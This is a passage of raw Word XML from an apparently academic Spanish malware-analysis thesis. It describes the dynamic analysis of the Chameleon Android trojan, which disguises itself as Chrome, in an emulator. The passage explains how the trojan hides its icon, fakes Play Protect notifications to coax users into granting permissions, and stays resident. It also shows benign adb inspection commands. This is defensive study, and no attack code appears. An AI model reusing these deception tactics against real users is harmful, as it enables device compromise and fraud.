        </w:rPr>
        <w:t>4.1.3   Análisis dinámico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="0D112E64" w14:textId="77777777" w:rsidR="002826A1" w:rsidRDefault="002826A1" w:rsidP="002826A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014879E4" w14:textId="43EBA61C" w:rsidR="00353933" w:rsidRDefault="002826A1" w:rsidP="00AB7F6A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El primer paso de esta fase es la creación del dispositivo emulado en el sistema elegido. En una primera instancia se utiliza Android Studio y en el caso de necesitar permisos de superusuario para realizar las tareas deseadas, se pasará a utilizar un dispositivo Geny</w:t>
      </w:r>
      <w:r w:rsidR="00CF40EF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">otion. </w:t>
      </w:r>
      <w:r w:rsidR="000F4CC4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Los dispositivos creados por Android Studio guardan su estado entre ejecuciones, pero es posible que sea necesaria la creación de varias instancias en función de las comprobaciones a realizar o la posibilidad de la corrupción del sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89444B" w14:textId="77777777" w:rsidR="000845B2" w:rsidRDefault="002826A1" w:rsidP="00AB7F6A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El procedimiento más sencillo para instalar la aplicación </w:t>
      </w:r>
      <w:r w:rsidR="00F4004C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> simplemente arrastrar el archivo APK de la muestra elegida directamente a la pantalla del dispositivo emulado. Android Studio se encargará de instalar la aplicación automáticamente en el sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7B260" w14:textId="4F5F1F4C" w:rsidR="002826A1" w:rsidRDefault="002826A1" w:rsidP="00AB7F6A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Es importante destacar que esto difiere de lo que sería el proceso de instalación del malware por parte de potenciales víctimas en un entorno real, ya que Android no permite por defecto la instalación de aplicaciones no provenientes de terceras fuentes, y en este caso la muestra no está asociada a la Play Store. Por lo tanto, los usuarios deberían de desactivar </w:t>
      </w:r>
      <w:r w:rsidR="00914AD1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de manera consciente y voluntaria </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>este mecanismo de protección para que el malware se instal</w:t>
      </w:r>
      <w:r w:rsidR="00914AD1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ase con éxito</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00E655C4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> En el caso de los emuladores utilizados la instalación se produce de manera automática. Una vez realizada, podemos observar la aplicación en la interfaz de lista de aplicaciones instaladas con el nombre Chrome y el icono mostrado previamente en el análisis estático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C020A" w14:textId="16474D14" w:rsidR="00682BDD" w:rsidRDefault="00682BDD" w:rsidP="00AB7F6A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5DE14A" w14:textId="73C5F5DD" w:rsidR="000F4CC4" w:rsidRPr="002826A1" w:rsidRDefault="000C1FC5" w:rsidP="00AB7F6A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="38640133">
          <v:shape id="_x0000_s2055" type="#_x0000_t75" alt="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:14.85pt;width:133.9pt;height:191.5pt;z-index:31;visibility:visible;mso-wrap-style:square;mso-wrap-edited:f;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3" o:title="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="532965E1" w14:textId="1363F639" w:rsidR="00C22EB2" w:rsidRDefault="00682BDD" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el caso de contar con la aplicación Google Chrome real instalada, el malware esconde el icono de la aplicación troyano, de manera que no es visible de cara al usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181599D8" w14:textId="273F3487" w:rsidR="00C84312" w:rsidRDefault="00902E1F" w:rsidP="00C84312">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez se ejecuta la aplicación, lo primero que se observa es </w:t>
      </w:r>
      <w:r w:rsidR="003C1215">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el comienzo del proceso de obtención de permisos.</w:t>
      </w:r>
      <w:r w:rsidR="00A07CC8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> En la serie de capturas de pantalla se documentan los pasos seguidos y los recur</w:t>
      </w:r>
      <w:r w:rsidR="007D6370">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A07CC8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">os </w:t>
      </w:r>
      <w:r w:rsidR="007D6370">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que emplea</w:t>
      </w:r>
      <w:r w:rsidR="00A07CC8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware en cada caso</w:t>
      </w:r>
      <w:r w:rsidR="007D6370">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tratar de hacer que los usuarios otorguen los permisos</w:t>
      </w:r>
      <w:bookmarkStart w:id="72" w:name="_Toc107862713"/>
      <w:r w:rsidR="0052110E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. En primer lugar, se solicita la posibilidad de enviar notificaciones por parte de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B92A87" w14:textId="45C1344B" w:rsidR="001C0D87" w:rsidRDefault="000C1FC5" w:rsidP="00C84312">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="33E27B31">
          <v:shape id="Picture 11" o:spid="_x0000_s2054" type="#_x0000_t75" alt="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:166.1pt;margin-top:34.05pt;width:120.15pt;height:197.6pt;z-index:32;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4" o:title="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6E693" w14:textId="0F3134A9" w:rsidR="00DE3788" w:rsidRDefault="000C1FC5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="455822CD">
          <v:shape id="_x0000_s2053" type="#_x0000_t75" alt="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:156.35pt;margin-top:385.8pt;width:131pt;height:214.15pt;z-index:34;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5" o:title="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="08089667">
          <v:shape id="_x0000_s2052" type="#_x0000_t75" alt="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:157.05pt;margin-top:148.6pt;width:130.75pt;height:212.5pt;z-index:33;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6" o:title="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="003E39D3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En el caso de aceptar, se procede a mostrar una notificación simulando ser el servicio Play</w:t>
      </w:r>
      <w:r w:rsidR="00D90BB6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E39D3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Protect de Google [X] apremiando al usuario a otorgar los permisos necesario</w:t>
      </w:r>
      <w:r w:rsidR="00D90BB6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">s, además de </w:t>
      </w:r>
      <w:r w:rsidR="00D74148">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B54CBA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  incluir la serie de pasos a seguir </w:t>
      </w:r>
      <w:r w:rsidR="002360DD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> e incluso mostrar una pantalla personalizada con anima</w:t>
      </w:r>
      <w:r w:rsidR="002360DD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ción. La plantilla que genera esta pantalla inyectada se ha identificado  durante el análisis estático, y aquí se muestra para el caso específico de la aplicación troyana Chrome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEECE4A" w14:textId="77777777" w:rsidR="0059438A" w:rsidRDefault="0059438A" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A05DEC" w14:textId="77777777" w:rsidR="0059438A" w:rsidRDefault="0059438A" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEFF980" w14:textId="211978BC" w:rsidR="00377E19" w:rsidRDefault="000C1FC5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="521AE3F9">
          <v:shape id="_x0000_s2051" type="#_x0000_t75" alt="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:143.55pt;margin-top:150.9pt;width:123.6pt;height:202pt;z-index:35;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67" o:title="A screenshot of a phone&#13;&#10;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="24701726">
          <v:shape id="Picture 19" o:spid="_x0000_s2050" type="#_x0000_t75" alt="A white rectangular object with a black text&#13;&#10;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:144.3pt;margin-top:381.65pt;width:122.95pt;height:241.1pt;z-index:36;visibility:visible;mso-wrap-style:square;mso-wrap-edited:f;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v:imagedata r:id="rId68" o:title="A white rectangular object with a black text&#13;&#10;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00DE3788">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tras activar los permisos solicitados por parte de la aplicación, se puede utilizar como una aplicación estándar en el caso de que sea visible.</w:t>
      </w:r>
      <w:r w:rsidR="009E12AE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Si se ejecuta la aplicación estando conectado a internet, se podrá ver una interfaz estándar web del buscador Google, con la disposición mencionada previamente.  En caso contrario de no contar con conexión, la aplicación muestra la </w:t>
      </w:r>
      <w:r w:rsidR="000E735B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>interfaz de advertencia de fallo de internet</w:t>
      </w:r>
      <w:r w:rsidR="0052110E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="0052110E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">identificada y analizada </w:t>
      </w:r>
      <w:r w:rsidR="000E735B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>durante</w:t>
      </w:r>
      <w:r w:rsidR="0052110E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la fase estática:</w:t>
      </w:r>
      <w:r w:rsidR="00ED1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="73" w:name="_Toc170500176"/>
      <w:r w:rsidR="00377E19">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dura</w:t>
      </w:r>
      <w:r w:rsidR="009D4BAE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">nte la ejecución del malware también se puede observar una notificación permanente </w:t>
      </w:r>
      <w:r w:rsidR="009D4BAE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">que simula que el sistema Play Protect </w:t>
      </w:r>
      <w:r w:rsidR="00565659">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">(mencionado en la sección de estado del arte de esta memoria) en </w:t>
      </w:r>
      <w:r w:rsidR="009D4BAE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se encuentra en funcionamiento </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1969474A">
          <v:shape id="Picture 150" o:spid="_x0000_s2095" type="#_x0000_t75" alt="A screenshot of a phone&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:85.55pt;width:150.05pt;height:55.2pt;z-index:37;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69" o:title="A screenshot of a phone&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="009D4BAE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>constante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248149A" w14:textId="0FB542D8" w:rsidR="009D4BAE" w:rsidRDefault="00565659" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">No obstante, se puede comprobar que la aplicación que emite la notificación </w:t>
      </w:r>
      <w:r w:rsidR="00E91BE5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">no es el sistema Android, sino que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es realmente Chrome, es decir, el malware Chameleon. Además, el texto que utiliza la notificación se ha encontrado en las preferencias encriptadas analizadas en la fase estática, y una vez se entra en el detalle de la notificación desde el dispositivo infectado, se puede observar que esta utiliza para emitir este tipo de notificación el mecanismo de notificaciones de batería para el que ha obtenido previamente permiso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44650D1E" w14:textId="23AA3B51" w:rsidR="00565659" w:rsidRDefault="00000000" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="549F349D">
          <v:shape id="Picture 152" o:spid="_x0000_s2094" type="#_x0000_t75" alt="A screenshot of a phone&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:216.65pt;width:112.15pt;height:149.9pt;z-index:39;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0" o:title="A screenshot of a phone&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00E91BE5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tras acceder a los ajustes de notificaciones de la aplicación troyano, se puede observar los tipos de notificaciones que posee, y también el canal de notificaciones personalizado “</w:t>
      </w:r>
      <w:r w:rsidR="00E91BE5" w:rsidRPr="00E91BE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>My Channel2</w:t>
      </w:r>
      <w:r w:rsidR="00E91BE5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3C3FFBB6">
          <v:shape id="Picture 151" o:spid="_x0000_s2093" type="#_x0000_t75" alt="A screenshot of a phone&#10;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:5.55pt;width:138.1pt;height:96.05pt;z-index:3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1" o:title="A screenshot of a phone&#10;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00E91BE5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que se registra como parte de las operaciones realizadas en la clase </w:t>
      </w:r>
      <w:r w:rsidR="00E91BE5" w:rsidRPr="00E91BE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>NotificationRepeater</w:t>
      </w:r>
      <w:r w:rsidR="00E91BE5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrada durante el análisis estático. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46341CEF" w14:textId="32966BA5" w:rsidR="008628D8" w:rsidRDefault="008628D8" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para comprobar qué proceso o procesos se están ejecutando mientras la aplicación se encuentra activa podemos utilizar nuevamente la utilidad adb para obtener una consola en el dispositivo emulado y obtener la lista de procesos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D18832" w14:textId="528F39A5" w:rsidR="00C84312" w:rsidRPr="008628D8" w:rsidRDefault="008628D8" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008628D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>adb shell ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226E0F5B" w14:textId="56B415DF" w:rsidR="008628D8" w:rsidRDefault="008628D8" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">En la lista de procesos del dispositivo podemos observar que el paquete </w:t>
      </w:r>
      <w:r w:rsidRPr="002722F2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>com.busy.lady</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> perteneciente a Chameleon tiene un proceso con la función de kernel (columna WCHAN en la tabla de procesos) </w:t>
      </w:r>
      <w:r w:rsidRPr="002722F2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>do_epoll_wait</w:t>
      </w:r>
      <w:r w:rsidR="00D27957">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="002722F2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que funciona como mecanismo de escucha de eventos. Este proceso se encuentra activo incluso cuando la aplicación Chrome se cierra en el dispositivo, permitiendo al malware estar activo en todo momento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C785993" w14:textId="106E5CE4" w:rsidR="003A58B1" w:rsidRDefault="003A58B1" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para</w:t>
      </w:r>
      <w:r w:rsidR="000A58FB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtener más información acerca de los comportamientos del malware, podemos extraer los datos que está utilizando el paquete </w:t>
      </w:r>
      <w:r w:rsidR="000A58FB" w:rsidRPr="00642F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>com.busy.lady</w:t>
      </w:r>
      <w:r w:rsidR="000A58FB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mientras el malware se está ejecutando</w:t>
      </w:r>
      <w:r w:rsidR="006E4EC0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y almacenarlos en el host en el que se está realizando el análisis</w:t>
      </w:r>
      <w:r w:rsidR="000A58FB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, una vez más utilizando adb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554DCFA" w14:textId="75694B84" w:rsidR="000A58FB" w:rsidRDefault="00642F86" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00642F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>adb pull data/data/com.busy.lady</w:t>
      </w:r>
      <w:r w:rsidRPr="00642F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> /live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137E462" w14:textId="44ACE0C8" w:rsidR="006E4EC0" w:rsidRDefault="006E4EC0" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">De esta manera se obtiene todo el directorio de datos </w:t>
      </w:r>
      <w:r w:rsidR="00191768">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">indicado </w:t>
      </w:r>
      <w:r w:rsidR="00736509">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y se</w:t>
      </w:r>
      <w:r w:rsidR="003C3D5E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> copia en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la carpeta </w:t>
      </w:r>
      <w:r w:rsidRPr="006E4EC0">
        <w:rPr>
